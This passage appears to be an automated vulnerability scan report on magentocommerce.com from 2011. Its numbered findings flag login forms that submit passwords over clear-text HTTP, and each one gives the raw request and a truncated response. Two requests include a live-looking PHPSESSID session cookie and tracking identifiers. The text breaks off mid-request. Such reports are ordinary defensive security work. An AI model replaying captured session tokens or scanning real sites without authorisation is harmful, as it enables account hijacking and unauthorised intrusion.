Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175743; expires=Sat, 11-Aug-2012 15:02:23 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fproduct%2Fmagento-zend%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:02:23 GMT
Content-Length: 34344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.124. http://www.magentocommerce.com/product/mobile  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/mobile

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /product/mobile HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:01:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175711; expires=Sat, 11-Aug-2012 15:01:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fproduct%2Fmobile%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:01:52 GMT
Content-Length: 108871

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.125. http://www.magentocommerce.com/product/professional-edition  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/professional-edition

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /product/professional-edition HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:01:03 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175663; expires=Sat, 11-Aug-2012 15:01:03 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fproduct%2Fprofessional-edition%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:01:03 GMT
Content-Length: 40267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.126. http://www.magentocommerce.com/pt_BR  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /pt_BR

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /pt_BR HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:16:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176586; expires=Sat, 11-Aug-2012 15:16:26 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A7%3A%22%2Fpt_BR%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:16:27 GMT
Content-Length: 109441

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.127. http://www.magentocommerce.com/roadmap/issue-roadmap  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /roadmap/issue-roadmap

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /roadmap/issue-roadmap HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176444; expires=Sat, 11-Aug-2012 15:14:04 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A23%3A%22%2Froadmap%2Fissue-roadmap%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:04 GMT
Content-Length: 34644

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.128. http://www.magentocommerce.com/ru  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /ru

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /ru HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:03 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176501; expires=Sat, 11-Aug-2012 15:15:01 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fru%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:15:03 GMT
Content-Length: 69663

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.129. http://www.magentocommerce.com/services  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /services HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176207; expires=Sat, 11-Aug-2012 15:10:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fservices%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:08 GMT
Content-Length: 36548

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.130. http://www.magentocommerce.com/services/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /services/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175732; expires=Sat, 11-Aug-2012 15:02:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fservices%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:02:12 GMT
Content-Length: 36548

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.131. http://www.magentocommerce.com/services/course-pricing  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services/course-pricing

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /services/course-pricing HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175747; expires=Sat, 11-Aug-2012 15:02:27 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A25%3A%22%2Fservices%2Fcourse-pricing%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:02:27 GMT
Content-Length: 35078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.132. http://www.magentocommerce.com/services/course-schedule  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services/course-schedule

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /services/course-schedule HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:31 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175751; expires=Sat, 11-Aug-2012 15:02:31 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fservices%2Fcourse-schedule%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:02:31 GMT
Content-Length: 49762

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.133. http://www.magentocommerce.com/services/descriptions  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services/descriptions

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /services/descriptions HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/services/training
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170926; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fservices%2Ftraining%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fmedia%2Fscreencasts%2F%22%3Bi%3A2%3Bs%3A18%3A%22%2Fmedia%2Finterviews%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fproduct%2Fenterprise-level%2F%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.6.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:44:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171049; expires=Sat, 11-Aug-2012 13:44:09 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A4%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:44:09 GMT
Content-Length: 57276

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.134. http://www.magentocommerce.com/services/professional-services  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services/professional-services

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /services/professional-services HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175764; expires=Sat, 11-Aug-2012 15:02:44 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A32%3A%22%2Fservices%2Fprofessional-services%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:02:45 GMT
Content-Length: 35091

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.135. http://www.magentocommerce.com/services/register-for-training  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services/register-for-training

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /services/register-for-training HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175732; expires=Sat, 11-Aug-2012 15:02:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A32%3A%22%2Fservices%2Fregister-for-training%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:02:13 GMT
Content-Length: 41049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.136. http://www.magentocommerce.com/services/testimonials  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services/testimonials

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /services/testimonials HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175741; expires=Sat, 11-Aug-2012 15:02:21 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A23%3A%22%2Fservices%2Ftestimonials%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:02:21 GMT
Content-Length: 36222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.137. http://www.magentocommerce.com/services/training  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services/training

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /services/training HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/media/screencasts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
